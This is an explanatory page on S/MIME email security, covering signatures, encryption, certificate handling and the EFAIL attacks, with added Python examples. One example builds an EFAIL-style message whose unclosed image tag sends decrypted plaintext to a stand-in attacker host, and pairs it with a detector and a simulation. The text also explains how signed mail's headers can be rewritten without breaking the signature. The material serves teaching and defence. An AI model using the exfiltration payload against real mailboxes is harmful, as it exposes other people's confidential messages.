Secure Multipurpose Internet Mail Extensions (S/MIME)
Multipurpose Internet Mail Extensions (MIME) is an Internet standard that extends the format of an email message to support non-ASCII character sets and multimedia attachments.
Secure Multipurpose Internet Mail Extensions (S/MIME) is an Internet standard for signing and encrypting MIME data.
- provides authentication, message integrity, nonrepudiation, and confidentiality for message content; often described as a presentation-layer service because it protects the MIME content itself rather than the transport, so the protection survives relaying through intermediate mail servers
- is a protocol for securing email communications
- encrypts emails and enables sender authentication to ensure confidentiality and integrity
- uses public key cryptography to secure email content: the body is encrypted with a fresh symmetric content-encryption key, which is in turn wrapped with each recipient's public key (CMS EnvelopedData), so the sender must already hold every recipient's certificate
- incorporates digital signatures to support sender verification and ensure messages are unmodified
- implementation is often complicated
- prone to misconfiguration
- complex certificate management and validation
- requires an X.509 certificate (with its private key) for each user; the certificate must be issued for the user's email address and must be distributed to anyone who wants to encrypt to that user
- can use RSA, DSA, and ECDSA for digital signatures
- can use AES and 3DES for message encryption
- is an end-to-end security solution
- defeats/complicates attempts to have enterprise-wide or server-hosted antimalware scanning
- because message content and attachments are encrypted end to end, a gateway scanner sees only ciphertext and cannot inspect them for malware or banned content; scanning then has to happen on the endpoint after decryption, or the gateway must hold the recipients' decryption keys, which breaks the end-to-end property
- signatures in the common multipart/signed form are detached: the body travels in cleartext as one MIME part and the application/pkcs7-signature part sits beside it, so non-S/MIME clients can still read the message
- the signature covers only the signed MIME entity (that body part and its own headers), not the outer RFC 5322 header fields such as From, To, Subject, and Date; those can be rewritten, or the signed part reused inside a different message, without the signature failing
- a valid signature therefore proves that the certificate holder signed that content at some point, not that it was addressed to this recipient or sent as part of this particular message; the header fields shown in the client remain unauthenticated
- gateways that modify the body (appended disclaimers, rewritten links) invalidate the signature, which is one reason deployments see frequent "invalid signature" warnings
- in May 2018 a research team (Poddebniak, Müller et al.) disclosed the EFAIL attacks, and the EFF published an advisory the same day recommending that users disable automatic decryption in their clients
- direct exfiltration: an attacker who has obtained a ciphertext (from a compromised server, backup, or network capture) re-sends it to the victim wrapped in attacker-controlled MIME parts, for example an unclosed `<img src="http://attacker/...` tag in a text/html part placed before the encrypted part and a closing `">` after it; the client decrypts, merges the parts into one HTML document, and the resulting image request sends the decrypted plaintext to the attacker's server
- CBC/CFB gadget variant: S/MIME's CBC modes (3DES, AES-CBC) carry no integrity protection, so an attacker can manipulate ciphertext blocks to inject HTML into the decrypted plaintext itself
- affected many widely used email clients; mitigations are to stop rendering remote content and HTML in decrypted mail, to avoid automatic decryption, and to use authenticated encryption (AES-GCM, as specified in RFC 8551)
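The point above that a detached S/MIME signature covers only the signed MIME entity and not the outer headers, shown in code. This is an added example, not code from the original page: it builds a constructed multipart/signed message with a placeholder signature part, reconstructs the entity a real signer would hash (the first body part with its own headers, CRLF-canonicalised as in RFC 8551 section 3.1.1) and shows that rewriting Subject or To leaves that digest, and therefore a real signature over it, unchanged, while touching the body does not. Only the standard library is used; no signature is actually verified.

```python
import hashlib
from email import message_from_bytes, policy

# Constructed sample message in multipart/signed form (RFC 8551 section 3.5.3).
# The application/pkcs7-signature part is a placeholder, not a real CMS blob:
# the point is which bytes a real signature would commit to, not verifying one.
SIGNED_MSG = (
    b"From: alice@example.org\r\n"
    b"To: bob@example.org\r\n"
    b"Subject: Invoice approval\r\n"
    b"Date: Mon, 01 Jan 2024 10:00:00 +0000\r\n"
    b"MIME-Version: 1.0\r\n"
    b"Content-Type: multipart/signed; protocol=\"application/pkcs7-signature\";\r\n"
    b" micalg=sha-256; boundary=\"sigbound\"\r\n"
    b"\r\n"
    b"--sigbound\r\n"
    b"Content-Type: text/plain; charset=us-ascii\r\n"
    b"Content-Transfer-Encoding: 7bit\r\n"
    b"\r\n"
    b"Please pay invoice 1234 to account 99-1.\r\n"
    b"--sigbound\r\n"
    b"Content-Type: application/pkcs7-signature; name=\"smime.p7s\"\r\n"
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n"
    b"UExBQ0VIT0xERVI=\r\n"
    b"--sigbound--\r\n"
)


def signed_entity_bytes(raw: bytes) -> bytes:
    """Return the MIME entity an S/MIME detached signature covers.

    That is the first body part of the multipart/signed container, its own headers
    included, with CRLF line endings (RFC 8551 section 3.1.1 canonical form).
    Nothing outside it, in particular the outer From/To/Subject/Date fields, is part
    of what gets signed.
    """
    msg = message_from_bytes(raw, policy=policy.default)
    if msg.get_content_type() != "multipart/signed":
        raise ValueError("not a multipart/signed message")
    parts = msg.get_payload()
    if len(parts) != 2 or parts[1].get_content_type() != "application/pkcs7-signature":
        raise ValueError("expected one signed entity followed by an application/pkcs7-signature part")
    entity = parts[0]
    header_block = b"\r\n".join(
        f"{name}: {value}".encode("ascii") for name, value in entity.items()
    )
    body = entity.get_payload(decode=True) or b""
    body = body.replace(b"\r\n", b"\n").replace(b"\n", b"\r\n")  # canonical CRLF
    return header_block + b"\r\n\r\n" + body


def message_digest(raw: bytes) -> str:
    """SHA-256 over the signed entity: with micalg=sha-256 this is the value the signer
    places in the CMS messageDigest signed attribute and the verifier recomputes."""
    return hashlib.sha256(signed_entity_bytes(raw)).hexdigest()


def signature_unaffected(original: bytes, modified: bytes) -> bool:
    """True when the modification left the signed entity untouched, so a signature
    that verified on the original message still verifies on the modified one."""
    return message_digest(original) == message_digest(modified)


if __name__ == "__main__":
    retitled = SIGNED_MSG.replace(b"Subject: Invoice approval", b"Subject: URGENT: pay today")
    readdressed = SIGNED_MSG.replace(b"To: bob@example.org", b"To: carol@example.org")
    altered = SIGNED_MSG.replace(b"account 99-1", b"account 66-6")
    print("Subject rewritten, signature still verifies:", signature_unaffected(SIGNED_MSG, retitled))
    print("To rewritten, signature still verifies:", signature_unaffected(SIGNED_MSG, readdressed))
    print("body altered, signature still verifies:", signature_unaffected(SIGNED_MSG, altered))
```

The practical consequence for a client or gateway: a verified S/MIME signature vouches for the bytes returned by `signed_entity_bytes`, and any policy decision ("this came from alice@example.org, addressed to me, about this subject") that relies on the outer header fields is relying on unauthenticated data unless the client cross-checks the From address against the signer certificate's rfc822Name.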
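The EFAIL direct-exfiltration shape described above, as an added example that is not part of the original page: a constructed attacker message sandwiches a (placeholder) captured application/pkcs7-mime part between an unclosed `<img src=...` fragment and a closing `">`. `efail_findings` is a structural check a gateway or client can run before decrypting anything; `urls_fetched_by_vulnerable_client` models the pre-fix client behaviour (decrypt, concatenate all HTML into one document, render with remote content enabled) and returns the URL such a client would request. The `decrypt` callable and the plaintext it returns are simulated stand-ins for the real CMS decryption with the victim's private key; everything else is the standard library.

```python
from email import message_from_bytes, policy
from html.parser import HTMLParser

# MIME types S/MIME uses for encrypted (EnvelopedData) content.
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime"}

# Constructed attacker message in the EFAIL direct-exfiltration shape. The base64
# payload is a placeholder standing in for the stolen ciphertext, not a real CMS blob.
ATTACKER_MSG = (
    b"From: attacker@evil.example\r\n"
    b"To: bob@example.org\r\n"
    b"Subject: Fwd: your contract\r\n"
    b"MIME-Version: 1.0\r\n"
    b"Content-Type: multipart/mixed; boundary=\"mix\"\r\n"
    b"\r\n"
    b"--mix\r\n"
    b"Content-Type: text/html; charset=us-ascii\r\n"
    b"\r\n"
    b"<img src=\"http://attacker.example/collect?d=\r\n"
    b"--mix\r\n"
    b"Content-Type: application/pkcs7-mime; smime-type=enveloped-data; name=\"smime.p7m\"\r\n"
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n"
    b"UExBQ0VIT0xERVI=\r\n"
    b"--mix\r\n"
    b"Content-Type: text/html; charset=us-ascii\r\n"
    b"\r\n"
    b"\">\r\n"
    b"--mix--\r\n"
)

# Constructed benign message: the encrypted part is the entire body, nothing beside it.
BENIGN_MSG = (
    b"From: alice@example.org\r\n"
    b"To: bob@example.org\r\n"
    b"Subject: your contract\r\n"
    b"MIME-Version: 1.0\r\n"
    b"Content-Type: application/pkcs7-mime; smime-type=enveloped-data; name=\"smime.p7m\"\r\n"
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n"
    b"UExBQ0VIT0xERVI=\r\n"
)


def _unclosed_tag(html: str) -> bool:
    """An opening '<' with no '>' after it: the fragment swallows whatever follows it."""
    return html.rfind("<") > html.rfind(">")


def efail_findings(raw: bytes) -> list[str]:
    """Structural checks that need no key material: flag encrypted parts that have
    unencrypted siblings, and HTML fragments that end inside an unclosed tag."""
    findings: list[str] = []

    def scan(container, path: str) -> None:
        if not container.is_multipart():
            return
        children = container.get_payload()
        for i, child in enumerate(children):
            ctype = child.get_content_type()
            if ctype in ENCRYPTED_TYPES and len(children) > 1:
                findings.append(
                    f"{path}[{i}]: encrypted part has {len(children) - 1} sibling part(s); "
                    "its plaintext would be rendered together with unencrypted, unauthenticated content"
                )
            if ctype == "text/html" and _unclosed_tag(child.get_content()):
                findings.append(f"{path}[{i}]: text/html fragment ends inside an unclosed tag")
            scan(child, f"{path}[{i}]")

    scan(message_from_bytes(raw, policy=policy.default), "body")
    return findings


class _ImgSources(HTMLParser):
    """Collect the src attribute of every <img> tag in a document."""

    def __init__(self) -> None:
        super().__init__()
        self.urls: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.urls += [value for name, value in attrs if name == "src" and value]


def urls_fetched_by_vulnerable_client(raw: bytes, decrypt) -> list[str]:
    """Model of the pre-EFAIL client: decrypt each S/MIME part, join all HTML into one
    document and render it with remote images enabled. Returns the URLs it would fetch.
    `decrypt` is a stand-in for CMS decryption with the recipient's private key."""
    msg = message_from_bytes(raw, policy=policy.default)
    document: list[str] = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "text/html":
            document.append(part.get_content())
        elif ctype in ENCRYPTED_TYPES:
            document.append(decrypt(part.get_payload(decode=True)))
    parser = _ImgSources()
    parser.feed("".join(document))
    parser.close()
    return parser.urls


if __name__ == "__main__":
    for finding in efail_findings(ATTACKER_MSG):
        print("finding:", finding)
    print("benign message findings:", efail_findings(BENIGN_MSG))
    # Simulated decryption result standing in for the victim's real plaintext.
    leaked = urls_fetched_by_vulnerable_client(ATTACKER_MSG, lambda _ct: "Secret: merger closes Friday")
    print("URL a vulnerable client would request:", leaked)
```

The structural check is deliberately conservative: legitimate S/MIME mail places the encrypted part as the whole message body (or as the single child of a signed wrapper), so an encrypted part with siblings is itself suspicious regardless of what the siblings contain. The rendering model shows why the fix is to isolate decrypted content and block remote loads rather than to filter tags: any element that triggers a fetch would serve the attacker equally well.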